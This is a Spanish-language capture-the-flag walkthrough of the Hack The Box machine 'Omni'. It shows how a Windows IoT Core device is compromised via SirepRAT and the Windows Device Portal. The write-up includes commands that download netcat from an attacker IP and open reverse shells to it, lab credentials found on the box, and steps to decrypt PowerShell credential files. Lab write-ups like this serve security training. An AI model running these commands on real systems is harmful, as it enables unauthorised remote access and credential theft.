# Omni

**OS**: Other \
**Dificultad**: Fácil \
**Puntos**: 20

## Resumen
- Windows IoT Core
- SirepRAT
- Windows Device Portal
- Powershell Password Decryption

## Nmap Scan

`nmap -Pn -p- -sV -sC 10.10.10.204`

```
Nmap scan report for 10.10.10.204
Host is up (0.074s latency).
Not shown: 65529 filtered ports
PORT      STATE SERVICE  VERSION
135/tcp   open  msrpc    Microsoft Windows RPC
5985/tcp  open  upnp     Microsoft IIS httpd
8080/tcp  open  upnp     Microsoft IIS httpd
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=Windows Device Portal
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Site doesn't have a title.
29817/tcp open  unknown
29819/tcp open  arcserve ARCserve Discovery
29820/tcp open  unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port29820-TCP:V=7.80%I=7%D=8/24%Time=5F441673%P=x86_64-pc-linux-gnu%r(N
SF:ULL,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(GenericLines,10,"
SF:\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(Help,10,"\*LY\xa5\xfb`\x0
SF:4G\xa9m\x1c\xc9}\xc8O\x12")%r(JavaRMI,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\x
SF:c9}\xc8O\x12");
Service Info: Host: PING; OS: Windows; CPE: cpe:/o:microsoft:windows
```

## Enumeración

En los resultados del escaneo nos encontramos con un par de puertos interesantes **29819** y **8080**. Al parecer no se encuentra nada útil en el puerto más alto y en el puerto web podemos ver un panel de autenticación básica que por el momento no contamos con credenciales para acceder pero se logra leer **Windows Device Portal**.

`http://10.10.10.204:8080`

![1](img/1.png)

### Windows IoT Core

Investigando lo anterior llegamos a este [articulo](https://nakedsecurity.sophos.com/2019/03/05/windows-iot-exploit-permits-directly-connected-device-pwnage/) muy interesante que nos explica la forma de explotar una vulnerabilidad en los dispositivos Windows IoT Core, esto nos permite ejecución de comandos. \
Haciendo uso de la herramienta [SirepRAT](https://github.com/SafeBreach-Labs/SirepRAT) podemos explotar esta vulnerabilidad.

Primero subiremos el programa [netcat](https://eternallybored.org/misc/netcat/) de 64 bits al sistema y posteriormente obtener una reverse shell.

```
python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c powershell IWR http://10.10.15.112/nc64.exe -Outfile C:\Windows\System32\spool\drivers\color\nc64.exe"
```

![2](img/2.png)

```
python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\spool\drivers\color\nc64.exe" --args "-e cmd.exe 10.10.15.112 1234"
```

![3](img/3.png)

Después de enumerar el sistema nos encontramos con una archivo interesante llamado **r.bat** que contiene el password del usuario **app** y **administrador**.

`type "C:\Program Files\WindowsPowerShell\Modules\PackageManagement\r.bat"`

![4](img/4.png)

## Escalada de Privilegios (User)

Si recordamos el puerto **8080** nos pedía credenciales para acceder, con el usuario app y su password respectivamente podemos acceder a la aplicación web.

```
app : mesh5143
```

`http://10.10.10.204:8080/#Device%20Settings`

![5](img/5.png)

### Windows Device Portal

En el apartado **Processes** hay una opción llamada **Run command** que nos permite ejecutar comandos del sistema.

- `http://10.10.10.204:8080/#Run%20command`
- `powershell $env:username`

![6](img/6.png)

Podemos hacer uso del programa netcat que hemos subido previamente para obtener una reverse shell.

- `rlwrap nc -lvnp 4321`
- `C:\Windows\System32\spool\drivers\color\nc64.exe -e cmd.exe 10.10.15.112 4321`

![7](img/7.png)

![8](img/8.png)

### Powershell Password Decryption

Intentado leer el archivo **user.txt** nos damos cuenta de que está encriptado.

`type C:\Data\Users\app\user.txt`

![9](img/9.png)

Investigando como desencriptar el archivo encontramos este [articulo](https://www.travisgan.com/2015/06/powershell-password-encryption.html) que nos explica como obtener el texto en plano.

- `$credential = Import-CliXml -Path C:\Data\Users\app\user.txt`
- `$credential.GetNetworkCredential().Password`

![10](img/10.png)

## Escalada de Privilegios (Root)

Repitiendo el proceso anterior podemos acceder a la aplicación web con el usuario administrador y obtener una reverse shell.

```
administrator : _1nt3rn37ofTh1nGz
```

- `rlwrap nc -lvnp 5555`
- `C:\Windows\System32\spool\drivers\color\nc64.exe -e cmd.exe 10.10.15.112 5555`

![11](img/11.png)

![12](img/12.png)

Igualmente la bandera root está encriptada.

`type C:\Data\Users\administrator\root.txt`

![13](img/13.png)

Procedemos a desencriptar el archivo **root.txt**.

- `$credential = Import-CliXml -Path C:\Data\Users\administrator\root.txt`
- `$credential.GetNetworkCredential().Password`

![14](img/14.png)

## Referencias
https://docs.microsoft.com/en-us/windows/iot-core/manage-your-device/deviceportal \
https://nakedsecurity.sophos.com/2019/03/05/windows-iot-exploit-permits-directly-connected-device-pwnage/ \
https://github.com/SafeBreach-Labs/SirepRAT \
https://eternallybored.org/misc/netcat/ \
https://www.travisgan.com/2015/06/powershell-password-encryption.html